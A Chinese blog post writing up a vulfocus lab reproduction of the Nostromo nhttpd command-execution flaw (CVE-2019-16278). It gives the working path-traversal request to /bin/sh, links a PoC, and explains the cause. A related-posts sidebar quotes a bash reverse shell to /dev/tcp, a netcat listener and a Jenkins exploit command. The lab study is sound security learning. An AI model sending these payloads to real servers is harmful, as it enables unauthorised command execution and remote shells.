vulfocus漏洞学习——nostromo 远程命令执行 (CVE-2019-16278)

于 2025-03-25 10:54:25 发布
阅读量402 收藏 3
点赞数 13
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88083440/article/details/146485512
版权

目录

漏洞利用

漏洞成因

也是成功把vulfocus镜像给整好了,而且竟然能成功拉取镜像!(我用的服务机是centos 7,以前都是kali 或 Ubuntu>-<)

启动靶场环境,在此之前,先了解一些基础的东西

(1)Nostromo 是一款开源的Web服务器,专为Unix/Linux系统设计,常用于嵌入式设备等

(2)此漏洞的根源是:Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。

 影响版本:
Nostromo <= 1.9.6

漏洞利用

直接抓包

然后进行改包

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 192.168.57.143:9203
Content-Length: 26

echo
echo
ifconfig 2>&1

可以看到这里是可以直接执行命令的。

积累该POC直接运用

https://github.com/jas502n/CVE-2019-16278

然后再来学习一下该漏洞究竟是如何生成的。

漏洞成因

输入:/.%0d./.%0d./.%0d./.%0d./bin/sh
(1)首先,服务器会对我们的输入进行解码,使得输入变为:
/.\r./.\r./.\r./.\r./.\r./bin/sh  \r为回车符
(2)接下来,Nostromo的路径解析函数(如http_proc)会将 \r 视为路径分隔符,导致路径被分割为:
/. . /. . /. . /. . /bin/sh 
(3)然后服务器对分割后的路径进行规范化处理:
/../../../../bin/sh   从而得到了目录穿越的目的
(4)http_proc函数会调用 execve()执行命令

c30%00
关注
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1895
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 453
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
Vulfocus】weblogic wls-wsat组件远程命令执行CVE-2017-3506)漏洞复现
最新发布
JavaLord123的博客
09-26 949
本文详细描述了Vulfocus靶场中weblogic wls-wsat组件远程命令执行CVE-2017-3506)复现过程
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 1463
vulfocus复现:Spring Framework 远程命令执行漏洞
(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1263
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。
Vulfocus解题复现】nostromo 远程命令执行CVE-2019-16278
温氏效应
11-23 5302
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
Vulfocus练习之Nostromo nhttpd远程命令执行(CVE-2019-16278)
weixin_45701865的博客
12-12 1040
nostromo远程命令执行(CVE-2019-16278)
Nostromo 1.9.6 远程代码执行漏洞CVE-2019-16278
孤桜懶契
03-28 1290
漏洞描述 用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。 漏洞影响 s ✅Nostromo 1.9.6 空间测绘 d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==
Nostromo Web服务器的远程命令执行CVE-2019-16278)复现
玄道的网安博客
01-30 1007
简介 Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 影响版本 nhttpd:version <= 1.9.6 环境搭建 这里使用nostromo1.9.6的版本进行搭建 下载地址: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz 进入目录进行环境编译 cd /nostromo-1.9.6 make make install 完...
CVE-2019-16278-Nostromo Web Server远程代码执行
17bdw的编程备份笔记
12-17 227
本文主题主要是分析CVE-2019-16278漏洞原因、漏洞如何利用以及为什么会受到攻击。这个CVENostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器。 Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件。没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行...
漏洞复现-thinkphp-命令执行vulfocus/thinkphp-3.2.x
10-14 2491
【thinkphp-命令执行】日志包含
[Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)
00勇士王子的博客
01-06 1058
介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 靶场搭建 进入指定漏洞路径,执行命令 docker-c
vulfocus——discuz命令执行(wooyun-2010-080723)
m0_62063669的博客
09-15 1542
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
vulfocus复现:spring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 4202
vulfocus复现:spring 命令执行 (CVE-2022-22947)
未授权漏洞vulfocu靶场实战
beichenyyds的博客
03-03 7340
rsync未授权漏洞 打开会有一个输入flag的文本框,所以我们需要查找flag如图 把网站的ip信息收集到如图 在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入 rsync rsync://123.58.236.76 :19358/src/ 上面也说了flag在tmp目录下所以输入 rsync rsync://123.58.236.76:19358/src/tmp/ 可以查到flag 如图 复制到靶场flag位置 可以看到
入门漏洞——命令执行漏洞、目录浏览漏洞
栉风沐雪的博客
01-29 1909
目录浏览漏洞属于目录遍历漏洞的一种,由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,该漏洞可能由于开发者没有配置正确的默认首页文件,导致整个目录结构被罗列出来,暴露网站结构。命令执行(Command Execution)漏洞即可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,服务器没有对执行的命令进行过滤。用户可以随意执行系统命令,属于高危漏洞。可以执行cmd后的命令。
Nostromo远程命令执行(CVE-2019-16278)
m0_65150886的博客
02-26 653
在nhttpd <= 1.9.6版本中,Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。1.访问http://ip:port,出现如下页面,开始实验。3.将数据包发送给重发器,并修改get请求。2.通过burp进行抓包。
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
qq_42430287的博客
12-19 913
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自复现
Nostromo Quicksilver界面:打造个性化HUD主题
1. Nostromo-master:这表明用户提到的Nostromo可能是一个开源项目或者一个包含多个功能的软件包。用户可以从“Nostromo-master”文件中获取Quicksilver界面的资源文件和相关代码。开源项目通常包含一个主分支...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值